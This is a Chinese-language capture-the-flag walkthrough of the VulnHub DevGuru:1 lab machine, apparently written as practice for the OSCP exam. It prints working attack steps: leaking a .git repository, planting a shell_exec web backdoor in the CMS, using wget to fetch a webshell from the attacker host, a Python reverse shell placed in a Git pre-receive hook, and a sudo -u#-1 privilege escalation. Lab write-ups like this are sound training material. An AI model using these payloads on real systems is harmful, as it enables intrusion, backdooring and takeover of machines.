OSCP难度靶机之DevGuru:1

admin 2022年11月15日12:05:27安全文章评论6 views1913字阅读6分22秒阅读模式
虚拟机下载地址:https://www.vulnhub.com/entry/devguru-1,620/
虚拟机简介:您的任务是在他们的公司网站上查找漏洞并获取root权限
目标:1个flag
级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之DevGuru:1

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.144

查看开放22、80、8585端口

OSCP难度靶机之DevGuru:1

2、渗透测试

2.1 WEB渗透

1.爆破信息泄露

根据NMAP扫描结果,显示80端口存在git信息泄露,并且获取到站点域名为devguru.local

OSCP难度靶机之DevGuru:1

使用git泄露工具进行利用,链接地址https://github.com/internetwache/GitTools

git clone https://github.com/internetwache/GitTools.git
cd Dumper
mkdir website
./gitdumper.sh http://192.168.207.144/.git/ ./website

OSCP难度靶机之DevGuru:1

2.导出git所有文件

查看下载的TXT文件获取到账号和密码信息

cd GitTools/Extractor
./extractor.sh ../Dumper/website ./web

OSCP难度靶机之DevGuru:1

查看存在adminer.php页面

cd web/0-7de9115700c5656c670b34987c6fbffd39d90cf2
ls

OSCP难度靶机之DevGuru:1

OSCP难度靶机之DevGuru:1

3.访问站点数据库

在本地config目录中发现数据库的账号和密码信息

OSCP难度靶机之DevGuru:1

OSCP难度靶机之DevGuru:1

基于上面内容可以成功登录数据库后台

OSCP难度靶机之DevGuru:1

选择数据库账号信息,获取到账号frank的密码信息

OSCP难度靶机之DevGuru:1

4.重置账号密码

查看密码加密方式,通过站点进行确认https://www.tunnelsup.com/hash-analyzer/

OSCP难度靶机之DevGuru:1

使用在线生成密码,https://www.devglan.com/online-tools/bcrypt-hash-generator

OSCP难度靶机之DevGuru:1

把生成的密码替换密码字段

OSCP难度靶机之DevGuru:1

使用如下URL成功登录,http://192.168.207.144/backend/

OSCP难度靶机之DevGuru:1

登录成功后站点信息如下

OSCP难度靶机之DevGuru:1

5.命令执行

在控制台面板中添加命令执行参数

function onStart()
{
$this->page["myVar"] = shell_exec($_GET['cmd']);
}

OSCP难度靶机之DevGuru:1

选择Markup中添加新的方法并保存

OSCP难度靶机之DevGuru:1

访问站点进行测试,查看网页源代码

http://192.168.207.144/shell?cmd=ls%20-la

OSCP难度靶机之DevGuru:1

6.下载反弹shell

在kali中开启http服务

python -m http.server 8080

OSCP难度靶机之DevGuru:1

通过命令执行方式下载远端webshell木马文件

http://192.168.207.144/shell?cmd=wget http://192.168.207.130:8080/shell.php

OSCP难度靶机之DevGuru:1

OSCP难度靶机之DevGuru:1

使用NC进行监听并访问webshell

http://192.168.207.144/shell.php

OSCP难度靶机之DevGuru:1

7.查看主机信息

在/var/backups/中发现有一个备份的配置文件

OSCP难度靶机之DevGuru:1

在服务字段中发现备份文件在8585端口的配置服务

OSCP难度靶机之DevGuru:1

在配置文件中发现另外一个mysql的账号和密码信息

OSCP难度靶机之DevGuru:1

通过获取到的账号成功登录新的数据库中,并发现同时存在frank账号

OSCP难度靶机之DevGuru:1

重新修改frank账号密码,并修改密码加密方式为bcrypt

OSCP难度靶机之DevGuru:1

8.登录8585端口服务

通过修改后的密码成功登录该服务

OSCP难度靶机之DevGuru:1

选择仓库地址

OSCP难度靶机之DevGuru:1


选择设置--Git Hooks---Pre-receive

OSCP难度靶机之DevGuru:1

写入反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.207.130",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
OSCP难度靶机之DevGuru:1

选择README.md文件进行随意修改并进行提交

OSCP难度靶机之DevGuru:1

OSCP难度靶机之DevGuru:1

OSCP难度靶机之DevGuru:1

成功获取到反弹shell连接

OSCP难度靶机之DevGuru:1

2.2 主机渗透

1.查看用户FLAG

cat /home/frank/user.txt

OSCP难度靶机之DevGuru:1

2.查看当前用户sudo权限

sudo -l
sudo -V

OSCP难度靶机之DevGuru:1

3.sudo提权

sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'

OSCP难度靶机之DevGuru:1

4.查看FLAG

cat /root/root.txt

OSCP难度靶机之DevGuru:1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之DevGuru:1

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月15日12:05:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  OSCP难度靶机之DevGuru:1 http://cn-sec.com/archives/1410000.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: